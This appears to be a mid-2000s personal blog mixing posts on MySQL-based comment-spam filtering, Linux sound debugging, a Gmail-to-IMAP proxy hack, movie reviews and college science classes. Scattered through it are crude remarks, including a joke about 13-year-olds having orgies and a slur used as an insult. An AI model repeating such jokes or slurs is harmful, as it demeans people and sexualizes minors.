Here's a select query that shows comment URLs that have been posted more than 5 times in the last 24 hours:

SELECT comment_author_url as a, count(*) as b
FROM $tablecomments
WHERE comment_author_url = ".$DB->quote($url)."
AND length(comment_author_url) > 0
AND comment_date >= (now() - INTERVAL 24 HOUR)
GROUP BY a HAVING b >= 5

Note the special MySQL INTERVAL notation for date computations. It's very useful.

Well, we will see how long these defenses last. Bring it on.

The one thing that has always annoyed me on my Powerbook is the sleep light. This is a pulsating light that comes on when the Powerbook is closed and sleeping. It looks as though it is breathing, and is quite cool. In fact I've seen other laptops trying to emulate this, some like the Dells doing a stepwise decrease and increase in intensity that just looks crappy compared to the Powerbook.

But this light is annoying as hell. In a dark room it is so bright that it lights up the whole room. I honestly have to cover the light when I sleep. I wish there was a way to control the intensity but there doesn't seem to be .

I saw the latest Bill Murray movie Broken Flowers. From the previews it looked alot like Lost in Translation. I didn't understand what the hype was over that movie. I didn't think it was that great.

Ebert gives Broken Flowers 4 stars. I don't really agree. The film is a meditation, very slow and lets its scenes settle in your stomach. It worked for awhile, but then just got overdone. There are some very unique and funny scenes, but there is simply not enough to make this a great movie. Sometimes a movie just comes across as being pretentious, as if it is claiming to be worth more than it actually is. That's the way I felt about this movie. There are exceedingly long shots of boring details like cars driving. And the damn music, was cool at first, but they kept playing the same song over and over as if they couldn't afford to purchase rights to more music.

However, there are some hilarious scenes. The Winston character was very touching in how much he tried to help, and the suggestion he was a reincarnation of a loyal dog was interesting. I especially like the scene where Murray goes and visits an old girlfriend (played by Sharon Stone) who has a daughter named Lolita. Lolita walks around the house naked trying to entice him. Boy that would be a tough household to live in .

Anyhow, you will either love it or hate it. It's supposed to be a thinking film, about philosophy and all that, but prepare to yawn a few times.

So I'm getting pounded by blog spam. I've had no time to attempt any coding to stop it due to school. Since my summer semester is over, I'll be trying a few hacks to reduce spam.

Seeing the spam I get, the comments all look the same, and they are just added to every one of my blog entries. So I thought, ok I'll just analyze the last comment that came from that IP. If it is the same length in characters, then I'll reject it. That was easy enough, since b2evolution is PHP and MySQL.

Then I noticed the MySQL soundex function. This does a phonetic algorithm to create a string. I thought why don't I use this to compare the new post to past posts.

I wanted to do most of it in MySQL since I hate PHP. That led me to figure out how to use variables to store data in MySQL. The following SQL statement would generate a soundex for the last comment posted and store it in the variable @sex :

SET @sex=''
SELECT (@sex:=soundex(comment_content))
FROM $tablecomments
WHERE comment_author_IP = '$user_ip' ORDER BY
comment_date DESC LIMIT 1

Then I compare this sex variable with the new comment coming in:

SELECT @sex = soundex('".$DB->escape($comment)."')

If that returns 1, then the soundexes match. Not the greatest spam protection in the world, but hey at least it's something. I know that by writing this post the spammers can easily bypass this. Go ahead you bastards, it will give me something to work on.

Update: So it seems I have instigated a fight. I'm being bombarded with spam now, all from different IPs. I'll have to do a little security through obscurity now...

I saw on CNN that children are now playing a choking game. Basically, the idea is to cut off blood supply to your brain for fun. I gotta hand it to the kids, they sure are coming up with new ideas. Can't we go back to the good old days of 13 year olds having orgies?

I got ahold of videos of the show Anatomy for Beginners. I believe it plays in the UK. Basically it is a full live human dissection in front of an audience, with very closeup cameras. You'll need a pretty strong stomach to watch this. What I found really interesting is when they took a frozen brain and put it in a slicing maching to show the internal structures. They could not use the real brain because the consistency is like jelly.

I was really impressed with the production quality of the whole thing. The person doing the dissection is highly skilled and did it blazingly fast. It is really amazing, and if you can get ahold of a copy I highly recommend it.

Here is a picture of the ocean on fire:

Yes, on fire! Imagine swimming in that. It's the result of methane gas being pumped from the bottom of the ocean.

I saw an interesting BBC show about Global Dimming. It started out with an interesting observation. After the 9/11 attack, virtually all planes were grounded for 3 days. During that time, temperature rose around the US by about 1 degree Celsius. Doesn't sound like much but to climate scientists, it's alot.

It had to do with airplane contrails not existing. The idea of global dimming is that pollution (in terms of particles) basically causes reflection of sunlight back out of the atmosphere. It reduces the temperature. It has other implications such as affecting rain/monsoon bands, and they say it was the cause of major drought in Ethiopia (and eventually the many deaths and save-an-Ethiopian commercials). If this were to affect monsoon bands in Asia, we are talking billions of people being affected.

What I find even more interesting is that global dimming offsets global warming. Countries that reduce pollution increase the affects of global warming. Scientists are saying that if we eliminate global dimming without reducing global warming as well, in 20 years temperature would rise 10 degrees Celsius. That basically means goodbye Florida and many other lowland areas due to glaciers melting and oceans rising.

So is the answer to just pump more pullutants to offset global warming? The problem with that is the pullutants are not very good for humans to breathe . Rain bands would also be affected, and the consequences of that are huge.

Murderball is best described as full-contact rugby for quadriplegics in Mad Max-style wheelchairs. I thought this movie would be lame until I read the reviews and saw the awards it won. I honestly expected a tearjerker, but was pleasantly surprised.

This is a documentary that is simply amazing. It is a very touching and inspirational film which portrays the quadriplegics in a light you normally do not see them in. These guys are badass, and can probably kick most normal people's asses. In the opening scene, you see a very tough quadriplegic putting on his own shorts, and from the beginning you realize what obstacles these people go through every day that we take for granted. It brings you into their world without compromise, and the direction is just top notch for a documentary.

I guarantee you will think twice about offering help to a quadriplegic after seeing this. You may think you are helping them when in actuality you are patronizing them. People respond differently. Think if you were in a wheelchair. Would you want everyone feeling sorry for you?

The film is rated R, and it's not for children. Some of these guys are not 'nice', but the competition is all in good spirit. The Canada vs US suspense was real. I really liked how they intercut the lives of the players with the game. There is a rather amazing scene where a doctor explains and demonstrates how to have quadriplegic sex. It's both sad and funny, because you realize that we all have basic human needs, quadriplegic or not.

One thing I really liked about this movie is using low budget techniques to do very cool stuff. When the quadriplegics are introduced, the camera zooms in on the back of their neck, which shows the scar of spine surgery. The film then blends to 3D pencil animations of the skeleton and the pins flying to be inserted in the spine. All done in a very slick and cool way. There are alot of other things in the movie that shows this director has some skill.

I saw this absolutely ridiculous contraption in Discover magazine and after reading "Exercise in exactly 4 minutes per day" I had to do a double take to see if the ad was a joke. I still don't know for sure.

What I do know is this contraption looks like some sort of torture device, and runs for the low price of $14,615. You would think they'd make a nice number like $14,600 or $14,599 but no its $14,615. Get yours now while supplies last.

What is very sad is people will actually buy this .

Here's a site that lists the best and worst cars for our atmosphere. Why not save the earth on your next car purchase? Or you could buy a Hummer.

I'm happy because I got a 96% on my 2nd Biological Principles exam. I was 3rd in my class of about 100. What's cool is the teacher pointed out all of us honor roll students in class. I like that because it gives a competitive edge to it and makes me want to be #1 next time. More teachers should be doing this.

Back when I did logarithms and 'e' in the past I really didn't see much practical use for them. Now that I've been out in the world, compound interest calculation is fun .

Let's say I invest $40k in a CD with compounding interest of 2%. What will I have in 5 years?

The formula is:

A = Pe^rt

^rt above means e raised to the 'rt' power

A = amount you will have
P = principal
r = interest rate
t = time in years
e = well, just e

So I end up with 40000e^(.02*5) which is $44206, or an increase of about $70 a month. Fun stuff.

Read a very interesting paper about using ultrasound for bacterial disinfection. From the paper:

Ultrasound is able to inactivate bacteria and deagglomerate bacterial clusters or flocs through a number of physical, mechanical and chemical effects arising from acoustic cavitation. On collapse, cavitation bubbles produce enough energy to mechanically weaken or disrupt bacteria or biological cells via a number of processes.

Makes me think what application this can have for humans. I wonder if such 'sound' could have affects on cell division and cancer.

Imagine a decontamination chamber in the future that a person goes in and is cleansed of bacteria from his body by sound waves.

My Infiniti FX35 was due for a 30k mile service. It costed $700!! You would think that an expensive car would have cheap maintenance, but that's not the case. I can't wait until my lease is over to get rid of this gas hog.

They gave me a loaner G35. I like that car alot. It has the same engine as my truck. Getting a loaner is fun because I can treat the car like shit. I had some fun flooring the gas and slamming the breaks.

Had a chance to checkout Hustle & Flow tonight and I thought it was a great movie. I have a soft spot for stories about people trying to get a record deal, and this movie captured the essence of making hiphop music. I used to have a little gig going producing such music. Ah, those were the days. I didn't really like the music in this movie as it's mostly what used to be called 'west side'. I don't know what it's called these days as I don't listen to much rap.

The main actor Terrence Dashon Howard was very good. I remember him as the pimp in Dead Presidents, and man that was one evil pimp. I honestly thought he was going to be a great actor after seeing that. Here he plays a 'good' pimp. All of the characters were very convincing, and the movie is just raw and gritty.

The ending was completely unexpected. Both sad and hopeful at the same time. Definitely check it out.

Melatonin is an over-the-counter drug that supposedly helps with jetlag. It's a substance that your body naturally produces. It supposedly lets you control your sleep better. My brother had some so I tried one.

First I learned you probably should not take it before sleeping. Unfortunately I did, and it took about 10 hours for me to feel anything. It made me kinda dull throughout the day, and created an oversensitivity to light. It did provide a relaxing effect and I could fall asleep during the day, whereas I normally have alot of trouble doing that. So for me at least, it seems a good pill for jetlag.

What is kinda strange is melatonin has a different effect than the chemical in cold medicines that make you sleepy. With melatonin, it's light-reacting. When there is light, you do not feel drowsy. It's only when it is dark that you get sleepy.

Update: Actually there are other factors affecting how quickly it works. I took this on an empty stomach and exercised right after, and I felt effects within 2 hours. Most dosage instructions recommend taking it right before sleeping, but if on a full stomach it will take some time to get into your bloodstream.

Tonight I checked out Rob Zombie's The Devil's Rejects. This movie pretty much takes pieces of From Dusk Till Dawn, Natural Born Killers, and The Texas Chainsaw Massacre and tries to make a new movie out of that. It had some interesting scenes, but it was nowhere near as stylish or intelligent as those other movies.

Sure there is some shocking dialogue and scenes, but I found it hard to place the characters in their roles. They came across as actors trying to be shocking. In Natural Born Killers and From Dusk Till Dawn there were believable characters and great acting. You actually empathized with the sick individuals. Here you don't really care what happens, other than wanting the cute female sadist to live.

The direction is pretty bad, and just comes across as mimicry of better directors. It's a fun movie though, and if you want to see some blood and gore you will get it. There is alot of Freebird-type music playing as people die, which to me seems played out. There is one hilarious scene about sex with chickens that is probably worth the price of admission. Don't worry, it's only dialogue.

I've gotten 97, 86, and 85 on my algebra exams. Everyone is venting in this class, and looking at the scores, you can see not many people are doing well. I am student 629956. I feel like a prison inmate. The teacher doesn't even give back the exams so you have no idea what you missed.

I was talking to one student who was getting good grades and attempted a quadratic formula derivation on the exam. He got no credit, just like me. But he said he put down everything correct, and checked this with his TA. Teacher's Assistants run the math 'lab' class. When he brought this up with the main teacher he said that he included more information than necessary and therefore got no points. When the student tried to debate this, the teacher's response was "I'm a mathematician."

Give me a break... it's fucking algebra.

There's a very interesting interview in the latest Discover magazine about sleep. Luckily they put it online.

There are some interesting points made in the interview. One being that you are more likely to remember something you've learned if you sleep right afterwards. But what's ironic is you are also more likely to remember something if you learn it just after waking. Throughout the day your synapses get 'heavier' and it is harder to retain information. Hmm, so when should I learn something new again?

The article describes an experiment that basically shows that when you learn something, there is more brain activity during sleep. Babies sleep so much more because of all they are learning. Some of those eureka moments come after sleep, and the idea is that during sleep, your brain increases the signal to noise ratio on the concepts you've learned. You are able to concentrate completely on the 'problem' without any distractions.

I pretty much hate self-help crap. But a friend sent this to me and it was interesting. Read on for your daily dose of self-help therapy.

Read more!

Yes I've went over to the dark side. You may notice that I now have google ads on the right side of my blog.

The majority of ads that seem to be popping up are related to blogging. Those advertisers must be searching for blogging keywords in the HTML, probably even b2evolution specific stuff, because I don't paste all over my site the more of the word 'blog' relative to other words.

However if you look on Prashant's blog, the ads are at least a bit more relevant. You can buy spiritual books and what not .

I thought it was pretty cool it let me customize the color of the ads to match my blog skin. It gave me a chance to use OS X's Digital Colormeter application to get the right hex color values.

Our Biology teacher described fainting in an interesting way. Basically it has to do with your brain needing more oxygen/blood. Your body wants to put your head in the same plane as your heart horizontally, so there is less resistance to pump blood there. What's the best way? Get you on the floor, immediately. Hence, the faint.

I don't know how factual this is, and I don't see it described this way anywhere else. I just find it amazing that no matter how much control you think you have of yourself, if the body thinks something is wrong, it will do whatever it can to fix the problem no matter what you may 'think'. It will just shut your consciousness off, as if it says "screw you, I'm taking over now."

Ok well, not exactly. But interesting story nonetheless.

I'm watching this great documentary by Carl Sagan called "Who Speaks for Earth?". I transcribed this quote which, in respect to recent events, is something people should think about.

Which aspects of our nature will prevail is uncertain, particularly when our visions and prospects are bound to one small part of this small planet Earth. But up there in the cosmos an inescapable perspective awaits. National boundaries are not evident when we view the Earth from space. Fanatic ethnic or religious or national identifications are a little difficult to support when we see our planet as a fragile blue crescent, fading to become an inconspicuous point of light against the bastion and citadel of the stars. There are not yet obvious signs of extra-terrestrial intelligence and this makes us wonder whether civilizations like ours rush inevitably headlong into self-destruction. I dream about it. And sometimes they're bad dreams.

Tonight I was thinking about the many different multivitamins out there and wondered if there was some site that objectively rated them. Searching on google for 'best multivitamin' returns alot of results that are either devoid of brand names or are links to sites that sell their own multivitamins with their own biased reviews. It's sort of like searching for 'best cialis' when you really want the best cialis . You end up with crappy search results.

It seems any objective reviewer is afraid to list any brand names. It gives the impression that the drug makers have alot of influence on such sites, similar to magazines and advertising. Maybe they think they will be sued if they said Centrum sucks.

I did come across this PDF which seems to be a pretty good review of the major brands.

I'm taking a class called Biological Principles which is basically college Biology II. The teacher is very good and makes the class interesting even in the boring areas. His lecture is composed of Powerpoint presentations with lots of nice graphics and animations. He gives it out on CD, and the .ppt files are like 40-50megs. Ouch.

He goes into funny anecdotes during his lecture which keeps it upbeat. Like today he mentioned some friends of his who let their dog 'french kiss' their baby. A student was arguing a dog's mouth is cleaner than a human's, but he pretty much said dogs lick their ass, and I don't want them french kissing me hehe. Then he said something like "then again, some humans lick their ass also" and the class laughed alot. Hehe, what? It's cool though, more teachers should be like that.

Anyway, I got an 89% (B+) on my first exam. That kinda sucks, because I really need to get an A in this class. I need to study harder. The students who get an A on an exam are put up as his first slide during a presentation and he points them out in class. Someone else told me this is not 'legal' to do, but I think it's actually encouraging. He makes a point that the majority of students who get A's sit in the front of the class, and tells everyone to do so. Another student I was talking to said he is going to get an A and sit at the back of the class just to prove him wrong, hehe.

We've been learning about cells in biology (cytology), and I vaguely remember some of this stuff from high school. I find it very interesting now though, and back then didn't really care much about this stuff.

One of the many structures a cell has is lysosomes. These are used within the cell as a sort of digestive system. They also eat and destroy broken parts of the cell itself, in a recycling process called autophagy. The first thing that popped in my mind when I read this is whether this could be a way for cancer cells to eat and destroy themselves. Wouldn't it be cool if cancer cells could be 'programmed' to self destruct.

Then I found out about apoptosis which is literally programmed cell death. Some more searching found that there has been research done on using lysosomes to fight cancer. That's something I'm very interested in.

Interesting article on brushing the tongue.

One thing I learned in Chemistry (yes I learned something) is that blue light in fireworks is the hardest to produce. Oxidized magnesium produces white light. Yellow light is easiest to make using sodium like Na3AlF6. Strontium produces red light, and barium green such as barium nitrate.

But blue light is the hardest to produce. Supposedly it can be made by decomposing copper(I) chloride at low temperature by mixing CuCl with KClO4, copper powder, and hexachloroethane C2CL6. It's only available in recently made, and probably expensive, fireworks.

Last night while watching fireworks I looked around for any blue lights and as expected I did not see any. The closest I saw was violet.

I checked out Romero's Land of the Dead tonight, which is being billed as Romero's Ultimate Zombie Masterpiece. Indeed it is. I love all of the social commentary zombie movies. At first I wasn't sure what to think of this movie, as it progressed kinda slow. But eventually everything built up and it was more than I expected.

This film is mainly about humans and how they treat each other. At the end of the movie you are actually rooting for the zombies. In previous zombie movies, they had no intelligence. In this case, they have evolved. There is sort of an alpha zombie, who has been learning tricks by watching humans and imitating them. There are a few scenes similar to 2001 where the monkey finds out how to use a tool. In this case, it is a machine gun, a sledgehammer, a gas pump, and a machete. That's evolution for you. There is a classic scene of the zombies busting into a beautiful apartment building where all of the upper class people are living, and I couldn't help wanting all those rich folk to be eaten. The movie gives a true impending dread as the zombies slowly figure out how to get past each of the city's obstacles.

There are 3 other scenes that stick out for me as sheer genius in this film. They may sound really stupid, but you have to see it to appreciate it. One is where a military dude is about to throw a grenade and a zombie cuts off his hand with a machete before he's able to release it. His hand falls down, and he falls on top of the grenade, blowing himself up. HAHA. The other is a zombie chewing off one of those sexy belly button rings. I laughed out loud at both of these scenes. The other scene is where the people are trapped between the electric fence they created to keep out the zombies which they can't turn off, and the zombies themselves. Let's just say a feeding frenzy ensues.

There are also other little nuances, like Dennis Hopper picking his nose and saying "Zombies really creep me out." If you liked Night of the Living Dead, Dawn of the Dead, 28 Days Later, or any other good zombie flick, you have to check this one out.

Awhile ago I had setup a Ubuntu Linux system for my mom to use. There were some issues with sound not working that I never really looked into. This morning I decided to look more into it.

Basically, the problem was that sound was not working. Looking at an 'lsmod' showed a snd-cmipci module loaded which I found out was the driver for my card (Crystal Media 8738). So I started checking log messages for any device not found messages but didn't find any. Sound applications, like Real Player, would just hang when they started. Doing an strace on them revealed them trying to open /dev/audio, /dev/dsp, or /dev/snd/pcmSomeHexCrap and just locking on that. Then I tried something simple:

echo a > /dev/audio

This should return immediately with some garbage sound sent to the device. But it didn't, and just hung.I thought it might be an IRQ or some sort of hardware conflict. I found on google mention of upgrading to a new ALSA driver (ALSA is what Ubuntu uses). So I downloaded the Alsa source, which then wanted a configured Linux kernel source. Ubuntu does not include this, and I didn't want to be fucking recompiling the kernel for sound.

So I said forget upgrading, I'll see if it's another problem. Just by chance, I SSH'ed remotely into the box and didn't login on the console. I tried the same echo command above and it worked. Then I tried aplay to play a sound and it worked. At this point sound was working when I didn't login to X. So some sound daemon X is starting is screwing things up. That narrowed it down.

I logged in on X and started looking at the lsof output of daemons that sound like they have something to do with sound . I found esd had /dev/dsp open, and a 'killall esd' later I was able to play sounds just fine. I ended up disabling the 'sound server' via System-Preferences-Sound as explained here, which said goodbye to esd. Real Player was happy now.

A Google search comes up with mention of using '-as 2' to esd which might help. I honestly don't give a shit. This just reinforces to me the pathetic state of sound on Linux.

In my Biology class we are talking about evolution. Originally, Lamarck described how characteristics are given to offspring. He said that characteristics acquired in an animal's life are passed on. This is simply incorrect, and the best example is that of a giraffe. Lamarck would say that a giraffe stretches his neck, and therefore its children will have long necks. That is like saying a human dyes her hair, and her offspring has the same color hair.

Darwin of course says that the process is natural selection. Those that are at a disadvantage to reproduce will die off. The idea is through generations and generations, mutations cause changes in an species, and some of those changes turn out to be advantageous. Those animals would reproduce more, and be more 'fit'.

Our teacher asked us to think of the Lamarck vs Darwin explanation for certain animals. One is the mole, which is blind. What would be the reason why the mole is blind? Lamarck would say that the eyes became less useful, and so became vestiges. That's wrong. The Darwinian explanation is that having eyes became disadvantageous. This could have been due to the eyes causing more problems than they solve since the animal is always underground. Dirt could get in the eyes, infections, etc. There was more likelihood that the blind moles survived and reproduced more than the seeing ones.

Another thing our teacher asked us to think about: tooth size in humans has been decreasing. I can see the Lamarck explanation, that large teeth are less useful than small teeth with the current diet. But this is not a Darwinian explanation. For that, there must be something that causes the big teeth humans to die off. Having small teeth must correlate somehow with being able to reproduce more.

The only explanation I can come up with is maybe large toothed humans had trouble finding mates and reproduced much less than the more attractive small toothed ones. That sounds ridiculous, but what other reason could it be?

There is also another concept called 'gene expression'. I don't know much about this, but I believe it is something like dormant characteristics or abilities that normally aren't available but are 'expressed' by some means. Maybe its being able to have an immunity to a certain type of disease. Basically evolution without the need for natural selection/offspring. That seems kinda crazy, and reminds me of the Lamarck view. I need to find out more about it.

Update: This paper lists some possible explanations for teeth size decreasing in humans. From the paper:

1. Dental reduction is a result of facial reduction. This in effect says that forces of selection don't effect teeth directly and presents a logical dilemma if we insist that teeth are directly affected by forces of natural selection.
2. Smaller teeth are an economic advantage; fewer resources go into making smaller teeth. A similar argument is made for why we can't synthesize vitamin C: in our ancestral past it was readily available. Early primates 'deleted' the ability to manufacture vitamin C as a biological economy measure. This argument has been dismissed by some as silly and inconsequential. Yet, measuring the 'biological cost' of growing teeth would be a creative laboratory project.
3. As early humans acquired culinary skills, teeth ceased to have survival value and they are just dwindling away due to the Probable Mutation Effect. This notion is complex, but is interesting for the light it sheds on some of our basic beliefs in biology.

Last weekend I ended my apartment lease and moved to my brother's house in Boca Raton. This is alot closer to FAU. I lose some privacy and a very nice apartment, but it's not too bad. Most of my time these days is spent in the library anyhow, and I pretty much have zero social life.

My first summer semester is over and I got an A in Chemistry I and a B+ in the lab. I should've got an A in the lab but they have some ridiculous online quiz system that the student is responsible to take before certain deadlines. I didn't meet the deadlines for a few of them simply because I forgot. I just think it's idiotic to make the students responsible for going to take a quiz. It should just be given in class.

Anyway, hopefully I can keep up the steam. There have been issues with how I'm going to fund this whole schooling thing but I think it will work out. I'll probably need to take a loan here and there.

I never much was a Batman fan, so I didn't plan on checking out Batman Begins. I had seen the trailer and liked Christian Bale from American Psycho, but that's about it. Then I read Ebert's review which got me interested. I found out from there that it was directed by Christopher Nolan and then I just had to see it. This is the director that did Memento, which I thought was an amazing achievement in filmmaking.

What a great movie. I never thought there was alot of philosophy and politics behind Batman, and judging from the Adam West TV show who would think that? At the beginning of the movie I saw monastaries and other Buddhism-like stuff and was thinking WTF? But this movie is very dark and thought-provoking indeed. It seems like that's the trend nowadays. Compare the 'darkness' factor of the early Star Wars to the latest one. Things are just alot meaner. It goes into 'why' there is a Batman, and I found it really interesting and inspiring. Batman is essentially a person that dedicates his life to an ideal. It's something I try to do in my little life as well. There is an interesting bit about him becoming a criminal and going to jail just to understand the criminal mind. That's how much dedication he had.

The movie talks alot about confronting one's fears. There is a very cool scene where pre-Batman is being 'initiated' by a league of crime-fighters. He is given a drug that magnifies all of his fears, and while on this drug, he must defend himself. It's a strange and dark scene, and I kept thinking this can't be for kids to watch. It's rated PG-13 though. Honestly I think it should be R.

I'm not sure if many people will like the movie. It has alot of action, but it also is heavy on dialogue. The direction is good. It was refreshing to see a car chase in a blockbuster movie that isn't a fucking car commercial for once. My only gripe is that during the fight scenes it is hard to tell what is going on. The camera flies everywhere. I understand it adds to the excitement factor, but it's a little overboard.

When I signed up for College Algebra, I thought this class would be a joke. I've taken courses up to Calculus 3 and Differential Equations more than 8 years ago. I'm taking the premed requisites again as I have retained no knowledge from those days.

I like math, and get a kick out of working out pointless problems. I don't see any practical uses for it other than to provide exercise for my brain in problem solving. But I have to say, this College Algebra class is the hardest math class I've ever been in. I learned that many people in the class are taking it for the 2nd and even 3rd time. When I first heard that I thought they must be fucking idiots. But this teacher seems to like torturing students.

Now I got a 96% on the first exam, and just took the 2nd one today. It was much harder than the first, but I think I did fairly well except for the gay word problems ('uniform motion', 'mixing coffee', and dumb speedboats going up and downriver). But I'm sort of at an advantage because I vaguely remember some of the stuff and I'm studying my ass off. My main problem is during class and the homework, the problems are ridiculously simple compared to the questions on the exam. I'm not sure what the teacher is trying to prove here, but it would definitely help students to go through problems of the same difficulty level as the exam during class. It's like they want students to fail in order to pay more money to re-take the course.

For extra credit on the exam they asked to derive the quadratic formula. Believe me, everyone needs extra credit in this class. I knew how to do it, but what's silly is if you didn't explain your steps or worded anything unclear you would get no points, not even partial credit. That's just plain idiotic.

I got a 96% on my 2nd Chemistry exam as well. That was easy, and I should've got a 100% if it weren't for some dumb mistake. Class average was 60% though .

Well I'm getting pounded with ridiculous blog spam. SURBL and MX checking on the URL is not helping. I'm tempted to disable comments altogether. I think what I'll do is not allow URLs altogether in comments.

I read an interesting interview in Discover magazine with Doug Melton regarding stem cell research and ethics.

An interesting quote:

What would happen if scientists injected human stem cells into a monkey embryo? What would grow? A human heart, a human brain, a toe? That is a kind of new biology that I find a million times more interesting than these specious arguments over whether life begins at fertilization.

On the fear of stem cell research:

I would tell you that my own view is that there is an innate fear of crossing boundaries; people feel secure with boundaries. Why have ideas of chimeras fascinated man for millenia? Minotaurs and mermaids? Why is that so intriguing? If you think about it, the whole idea of classifying animals is that you could find a thing called a species, give a sort of stamp of approval on the idea that there is a natural order, there are boxes, there are shelves where everything has its so-called natural place. What is natural and what is anti-natural changes with time and is a very difficult subject.

People get the heebie-jeebies when you talk to them about putting a human brain into a dog. In fact, I would suggest there are two contexts where I think there might be an interesting connection. There is something like a natural double take when you see a person who's seriously deformed. People mostly say, when you see a burn victim or a person who's had an arm amputated, that the reason you're drawn to look at these poor people is the fear that it could happen to you. I actually think it's something deeper than that. I think it has to do with an affront to this idea of the natural order...

What was the significance of Mary Shelley's Frankenstein? Why was Frankenstein considered an important book? It was, in my view, because it addressed what is the essence of being human.

This sort of research is something that has always interested me. I would probably say that personally I am not bound by ethical or moral beliefs against creating a chimera if the research is helping us further science. I think the concept of a human being can, should, and will be blurred in due time. It's not that I'm not religious, it's that I don't believe that humans are at the top of any divine ladder.

We had our first exam in Chemistry and I got a 100%. Hell I never did this good when I went to school in the past heh. Honestly I seem to take school more seriously now than I did back then. Hopefully I can keep up the steam.

I had originally planned on putting class notes up on my wiki, but I realized that after I take notes I rarely ever look at them again heh. I've found the best way to remember or understand something is doing alot of problems at the back of the chapters over and over again.

Well this will work for the problem-solving classes at least, but not much for memorization. For that I try to look for patterns and such. Like for the chem exam we have this cation/anion table that we are supposed to memorize, and the teacher says "there's no way to figure them out." But actually all you need to do is memorize a few key items from the table, not the whole thing, and you can calculate the rest (ion charge, number of each atom) from the periodic table which is given to you during a test. Also doing alot of problems you learn to recognize them alot faster, and are able to know which ones don't look right.

It's all about familiarity and practice. I know some people who have photographic memories. Not me, I have to do ALOT of practice to remember something.

So a Windows PC my mom was using got hosed and it seemed nontrivial to fix it. I said what the hell and installed Ubuntu Linux. I just showed her how to login and start a browser (that's all she normally does). I think something like this is the best way to determine usability of a distribution.

The issues that came up so far is java, flash, and real audio not working. Of course no distro I've ever used actually includes this stuff. Is it really just licensing issues? Luckily Ubuntu has a wiki page describing how to install these. It was relatively simple, but could've been simpler.

The other problem is sound simply doesn't work. I found that out when Real Player wouldn't start and the process would just hang. I did an strace and saw it was trying to write to /dev/dsp and hanging. I didn't have a chance to look into this much, so whatever, no sound for now.

I think it's kinda lame that for someone to use Linux they still need Linux expertise to install plugins, setup apt repositories, and other crap that only a long-time Linux user can grasp. And forget about setting up a printer. It's almost like all distros are kept elite for the job security of Linux sysadmins. I would really like to see a day when a computer illiterate can use Linux without relying on a friend that knows Linux.

In general the system seems to be working and I haven't got too many complaints. We'll see how long that lasts, and when the Windows withdrawal symptoms set in.

So in case anyone is wondering, I've been going to school for about a week. At first I was very overwhelmed with the studies, and the summer classes are especially condensed. I'm starting to get the hang of it though. It's taking alot more of my time than work ever did!

I honestly enjoy the challenge. I know alot of the stuff I'm doing now is rather useless knowledge, but as an exercise, trying to memorize, solve problems, etc, is fun to me. It's like working out, but with your brain.

Probably the best thing I like is being able to wear shorts and rags every day. Man I am so sick of wearing office clothes! Students are here for a reason, and not to just jerk off. Everyone has a long-term goal, which I think is pretty cool. It's different at work in an office. Most people there feel they are at the end and have reached their goal.

This is not to say that I do not have doubts on my decision. In fact, I many times don't know whether I'm making the right choice. I think giving it at least 1 semester will help me decide if I want to continue this. Also, if I can't get good grades now, that will tell me it's time to go back to work.

I am not a big fan of Jet Li's blockbuster movies, however I do like his lesser known films. I felt like seeing a movie and saw that something called Unleashed was playing. After seeing the trailer it looked very interesting, and then I found out it was written by Luc Besson who wrote Leon The Professonal and La Femme Nikita. I knew it had to be good. His movies are usually about people ostracized from society but extremely talented in some brutal way.

It's basically about the Jet Li character being raised like a dog as a fighting machine. He soon becomes unleashed and gets to learn like a child what the world is about. It's a very dark movie at times, with Bob Hoskins playing an incredibly evil and convincing character. It's also a love story and has its sensitive sides. The fight scenes are exceptional, and it reminded me of Mad Max Beyond Thunderdome. There is a moving scene where after the Jet character experiences love and music, he is put in a pit to fight to death and tells his tormentor he no longer wishes to hurt people. Of course this only works for so long, with him only defending blows. But once the limits are pushed, the wild dog comes out again.

There is one very cool fight scene which I've never seen anything like before. It's a fight within a very claustrophobic bathroom. The walls are so close that just reaching back to throw a punch requires hitting a wall. The cinematography on this scene is pretty amazing.

The movie has alot of piano music in it, Mozart, etc. The character learns that he loves music. It was a great movie, but there were some teenagers in the theatre who pretty much were heckling the film and its music at the end. Throughtout the movie the music is by Massive Attack which are uptempo Matrix-like songs. It's still an extremely brutal film, so I'm wondering what sort of satisfaction these viewers were looking for.

I haven't been watching alot of TV so had no idea what this movie was about initially. What drew me to it was a previous movie also called Crash by David Cronenberg. Let's look at the plot outline of that movie on IMDB:

Since a road accident left him with serious facial and bodily scarring, a former 'TV scientist' has become obsessed by the marriage of motor car technology with what he sees as the `raw sexuality' of car-crash victims. The scientist, along with a crash victim he has recently befriended, sets about performing a series of sexual acts in a variety of motor vehicles, either with other crash victims or with prostitutes who they contort into the shape of trapped-corpses. Ultimately, the scientist craves a suicidal union of blood, semen and engine coolant, a union with which he becomes dangerously obsessed.

I loved that movie . In general, I loved all Cronenberg movies. They are so visceral and deal with extremely odd aspects of human behavior.

However, this new Crash is far from the old version. It's a story about racial tensions in Los Angeles, and I have to admit it's one of the most intelligent movies I've seen tackling this subject. It reminded me of Magnolia, where many different threads in the story are followed and they ultimately all interweave with each other as if through divine intervention. It shows how good people are capabable of evil, and how bad people are capable of good.

There is an interesting comment by the Don Cheadle character describing life in LA as being seperated from other beings between glass and steel and no one touches you. We desire so much to feel another person that we crash into them.

So I've been pretty bored lately and came across libgmail, a Python library to access Gmail. It's very much a hack in that emulates a web client.

But I was thinking, why don't I use this to write an IMAP interface to Gmail? So a few days ago I started working on such a hack. I'm sort of working backwards on this. Normally people would read the RFC. But instead, I configured mutt for IMAP, and started looking at some packet captures. I figure mutt's probably the cleanest IMAP client. I made my proxy behave how mutt expected from a normal IMAP client. Every now and then I'd refer to the RFC, but not much . In the backend, my proxy uses libgmail to get the needed info.

It's nowhere near completion, but I did get it to load up my inbox index in mutt. Here's a screenshot of my gmail account:

And here's a screenshot of mutt:

There are major problems in that when the message list is retrieved, all new messages are marked as seen. I don't see a way around this, since I need to get info on all messages to generate a proper index. I don't actually fetch the raw message to generate the message list, but instead 'fake' them by looking at the various info from the web interface (message date, from, to, subject, etc).

I'll probably post the code as soon as its in some usable state. But at that point, Google may have already released IMAP support . It's a fun project nonetheless.

Update: A few people have asked about this, and unfortunately I've had no time to work on it. It's in a pretty much unusable state. It only works with mutt and you can only view messages in the Inbox (cannot send, change folders, etc). I've posted the code here, but be warned it's unusable.

So I'm reading an Oreilly newsletter which gets sent to my gmail account. I came across this blog explaining some neat bash tricks. One of the comments pointed to a Unix Tip of the Day site which I thought would be cool to subscribe to.

